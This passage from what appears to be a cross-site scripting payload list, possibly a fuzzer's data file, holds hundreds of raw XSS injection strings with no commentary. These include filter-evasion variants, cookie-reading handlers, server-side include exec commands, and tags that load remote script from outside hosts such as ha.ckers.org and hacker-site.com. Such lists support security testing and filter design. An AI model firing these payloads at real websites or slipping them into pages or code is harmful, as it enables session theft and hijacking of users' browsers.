HREF="javascript:javascript:alert(1);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(1);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(1);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(1)></frameset> <object onerror=javascript:javascript:alert(1)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <IMG SRC=&{javascript:alert(1);};> <a href="javAascript:javascript:alert(1)">test1</a> <a href="javaascript:javascript:alert(1)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC="   javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ºscriptÊalert(¢XSS¢)º/scriptÊ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe  src="	javascript:prompt(1)	"> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt >alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=``
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X </script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> <img/  src=`~` onerror=prompt(1)> <form><iframe  src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[�]"� onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( �</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt(1)>'> <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert(1)> <///style///><span %2F onmousemove='alert(1)'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript:\u0061le%72t(1)"><button> <div onmouseover='alert(1)'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT:alert(1)">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript:alert(document.cookie)>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript:alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript:\u0061le%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript:alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
'';!--"<XSS>=&{()} '>//\\,<'>">">"*" '); alert('XSS <script>alert(1);</script> <script>alert('XSS');</script> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font style='color:expression(alert(document.cookie))'> <img src="javascript:alert('XSS')"> <script language="JavaScript">alert('XSS')</script> <body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red' onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif onerror=alert(1)> window.alert("Bonjour !"); <div style="x:expression((window.r==1)?'':eval('r=1; alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> "><script alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script> '">><marquee><h1>XSS</h1></marquee> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> <script>var var = 1; alert(var)</script> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> " onfocus=alert(document.domain) "> <" <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\"> <scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())> </script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "></iframe><script>alert(123)</script> <body onLoad="while(true) alert('XSS');"> '"></title><script>alert(1111)</script> </textarea>'"><script>alert(document.cookie)</script> '""><script language="JavaScript"> alert('X \nS \nS');</script> </script></script><<<<script><>>>><<<script>alert(123)</script> <html><noalert><noscript>(123)</noscript><script>(123)</script> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> '></select><script>alert(123)</script> '>"><script src = 'http://www.site.com/XSS.js'></script> }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> <SCRIPT>document.write("XSS");</SCRIPT> a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='><script>alert("xss")</script> <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script> <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script> ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" /><script>alert('xss');</script> <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=' "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=" \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\' http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS?? http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS?? '); alert('xss'); var x=' \\'); alert(\'xss\');var x=\' //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83)); >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt> <img src="svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img> </body> </html> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT> alert(ìXSSî); </SCRIPT> <BODY ONLOAD=alert("XSS")> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG SRC="javascript:alert('XSS');"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <IFRAME SRC=îhttp://hacker-site.com/xss.htmlî> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <TABLE BACKGROUND="javascript:alert('XSS')"> <TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html"> <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!--[if gte IE 4]>        <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG 